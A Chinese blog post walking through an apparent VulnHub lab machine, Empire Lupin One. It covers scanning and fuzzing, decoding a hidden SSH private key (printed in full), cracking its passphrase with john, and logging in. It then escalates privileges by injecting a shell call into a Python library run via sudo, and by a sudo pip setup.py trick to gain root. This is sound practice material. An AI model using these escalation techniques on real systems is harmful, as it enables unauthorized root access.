Vulnhub:Empire Lupin One靶机渗透测试

Aukum

已于 2024-05-08 16:31:33 修改

阅读量832

点赞数 21

分类专栏： VulnHub 文章标签：网络安全安全 linux

于 2024-05-07 19:42:03 首次发布

本文链接：https://blog.csdn.net/Aukum/article/details/138542577

版权

VulnHub 专栏收录该内容

9 篇文章 0 订阅

订阅专栏

信息收集

1、主机发现和端口扫描

# 主机发现
nmap 192.168.56.0/24 -sN

靶机ip：192.168.56.132。

# 对靶机进行全面扫描
nmap 192.168.56.132 -A

开放了80端口，访问发现是一个静态网页，没东西。

2、目录扫描

dirsearch -u http://192.168.56.132

渗透

1、深度扫描目录

访问信息收集扫描出来的目录，访问后有内容的如下：

都看过后没什么发现，但是robots.txt中提到/~myfiles，可能存在以~开头的文件。使用Web Fuzzer工具ffuf对http://192.168.56.132/~xx进行模糊测试从而深度扫描目录。

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u "http://192.168.56.132/~FUZZ"
-c:颜色输出 
-w:指定字典 
-u:url地址 
FUZZ:模糊测试点占位符

这里爆出secret文件，（ffuf不能够完整打印出爆破出来的URI路径，需手动补全）。这里访问后有三个信息：

创建这个目录是为了分享ssh私钥文件--》ssh私钥文件在该目录下
需要用fasttrack破解
用户名：icex64

根据第一条信息，该目录下有私钥文件。

# 指定爆破的文件扩展名，并且过滤403的返回状态码
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.56.132/~secret/.FUZZ' -e .txt,.html -fc 403

2、base58解密

扫出mysecret.txt，访问得到一段base58加密密文。为什么是base58，首先像base加密，其次看这段密文可以知道没有0,O,小写l,大写的i,"+"和"/"满足base58，找在线网站解码得到ssh私钥。

解码内容如下：
-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----

3、john破解

将解码内容存放到ssh_key内。尝试john（一款用于在已知密文的情况下尝试破解出明文的破解密码软件，破解hash格式）破解，需要先将ssh_key转化为hash。

# john破解
john --wordlist=/usr/share/wordlists/fasttrack.txt hash

得到密码P@55w0rd!。

4、ssh私钥登录

ssh私钥登录，账户为icex64。

ssh icex64@192.168.56.132 -i 私钥
# 回车输入破解得到密码

没成功，提示ssh_key没有权限。处理一下chmod 600 ssh_key。

成功登录。

5、提权-pip提权

# 列出目前用户可执行与无法执行的指令
sudo -l

根据结果得知，我们可以通过arsene用户，使用/usr/bin/python3.9和/home/arsene/heist.py，因为他nopasswd不需要密码。看一下heist.py的内容。他使用了一个叫webbrowser的库。find指令找到webbrowser.py，指令如下：find / -type f -name webbrowser.py 2>/dev/null

看下webbrowser.py的内容。很多代码，但是最关键的是导入了os模块，既然如此尝试使用os.system打开一个arsene的shell。在webbrowser.py内加上os.system("/bin/bash")。

# 运行修改后的heist.py脚本
sudo -u arsene python3.9 /home/arsene/heist.py

whoami命令，目前已经是arsene用户。

再次列出目前用户可执行与无法执行的指令sudo -l。发现有个root身份的指令可以使用。

pip提权。

TF=$(mktemp -d)
echo "import os; os.execl('/bin/bash', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

找到flag。